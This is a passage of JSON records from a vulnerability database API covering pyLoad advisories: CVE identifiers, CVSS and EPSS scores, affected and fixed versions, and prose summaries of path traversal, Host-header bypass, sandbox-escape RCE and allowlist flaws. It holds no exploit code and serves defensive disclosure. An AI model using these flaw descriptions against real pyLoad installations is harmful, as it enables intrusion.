issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47821","reference_id":"","reference_type":"","scores":[{"value":"0.01807","scoring_system":"epss","scoring_elements":"0.83225","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47821"},{"reference_url":"https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-302.yaml","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-302.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47821","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47821"},{"reference_url":"https://github.com/advisories/GHSA-w7hq-f2pj-c53g","reference_id":"GHSA-w7hq-f2pj-c53g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-w7hq-f2pj-c53g"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g","reference_id":"GHSA-w7hq-f2pj-c53g","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-28T17:19:04Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91193?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87"}],"aliases":["CVE-2024-47821","GHSA-w7hq-f2pj-c53g","PYSEC-2024-302"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-64ux-jb56-gub5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71603?format=json","vulnerability_id":"VCID-72ar-7tmw-ybcy","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35592","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18386","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35592"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-124.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-124.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35592","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35592"},{"reference_url":"https://github.com/advisories/GHSA-mvwx-582f-56r7","reference_id":"GHSA-mvwx-582f-56r7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvwx-582f-56r7"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7","reference_id":"GHSA-mvwx-582f-56r7","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:58:13Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-35592","GHSA-mvwx-582f-56r7","PYSEC-2026-124"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-72ar-7tmw-ybcy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/120952?format=json","vulnerability_id":"VCID-7uc5-ppjr-yqfj","summary":"pyLoad is the free and open-source Download Manager written in pure Python. The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive. This vulnerability is fixed in 0.5.0b3.dev92.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57751","reference_id":"","reference_type":"","scores":[{"value":"0.00121","scoring_system":"epss","scoring_elements":"0.30684","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57751"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57751","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57751"},{"reference_url":"https://github.com/advisories/GHSA-9gjj-6gj7-c4wj","reference_id":"GHSA-9gjj-6gj7-c4wj","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9gjj-6gj7-c4wj"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj","reference_id":"GHSA-9gjj-6gj7-c4wj","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-21T18:40:14Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91197?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev92","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev92"}],"aliases":["CVE-2025-57751","GHSA-9gjj-6gj7-c4wj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7uc5-ppjr-yqfj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/78115?format=json","vulnerability_id":"VCID-865y-shjm-xqam","summary":"pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33314","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01582","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33314"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-122.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-122.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33314","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33314"},{"reference_url":"https://github.com/advisories/GHSA-q485-cg9q-xq2r","reference_id":"GHSA-q485-cg9q-xq2r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q485-cg9q-xq2r"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r","reference_id":"GHSA-q485-cg9q-xq2r","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:33:35Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-33314","GHSA-q485-cg9q-xq2r","PYSEC-2026-122"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-865y-shjm-xqam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70499?format=json","vulnerability_id":"VCID-8hzh-53hk-6yaz","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains (\"proxy\", \"username\") and (\"proxy\", \"password\") — which protect the proxy credentials — but it does not include (\"proxy\", \"enabled\"), (\"proxy\", \"host\"), (\"proxy\", \"port\"), or (\"proxy\", \"type\"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42313","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.04091","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42313"},{"reference_url":"https://github.com/advisories/GHSA-4744-96p5-mp2j","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7"},{"reference_url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx"},{"reference_url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-127.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-127.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42313","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42313"},{"reference_url":"https://github.com/advisories/GHSA-pg67-9wjv-mr85","reference_id":"GHSA-pg67-9wjv-mr85","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg67-9wjv-mr85"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85","reference_id":"GHSA-pg67-9wjv-mr85","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:50:29Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42313","GHSA-pg67-9wjv-mr85","PYSEC-2026-127"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8hzh-53hk-6yaz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359592?format=json","vulnerability_id":"VCID-bby9-fzzw-myhs","summary":"Duplicate Advisory: pyload-ng vulnerable to RCE with js2py sandbox escape\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-r9pp-r4xf-597r. This link is maintained to preserve external references.\n\n## Original Description\nAn issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.","references":[{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205","reference_id":"CVE-2024-39205","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205"},{"reference_url":"https://github.com/advisories/GHSA-25pw-q952-x37g","reference_id":"GHSA-25pw-q952-x37g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-25pw-q952-x37g"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91193?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87"}],"aliases":["GHSA-25pw-q952-x37g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bby9-fzzw-myhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/106511?format=json","vulnerability_id":"VCID-bfu1-1u68-47bw","summary":"Any unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary packages","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-7346","reference_id":"","reference_type":"","scores":[{"value":"0.00739","scoring_system":"epss","scoring_elements":"0.73328","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-7346"},{"reference_url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36"},{"reference_url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11"},{"reference_url":"https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840"},{"reference_url":"https://github.com/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-x698-5hjm-w2m5"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-08T14:13:19Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5"}],"fixed_packages":[],"aliases":["CVE-2025-7346","GHSA-x698-5hjm-w2m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bfu1-1u68-47bw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/147801?format=json","vulnerability_id":"VCID-d2gv-3uu7-gudh","summary":"pyLoad 0.5.0 is vulnerable to Unrestricted File Upload.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-47890","reference_id":"","reference_type":"","scores":[{"value":"0.00343","scoring_system":"epss","scoring_elements":"0.57333","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-47890"},{"reference_url":"https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-47890","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_tex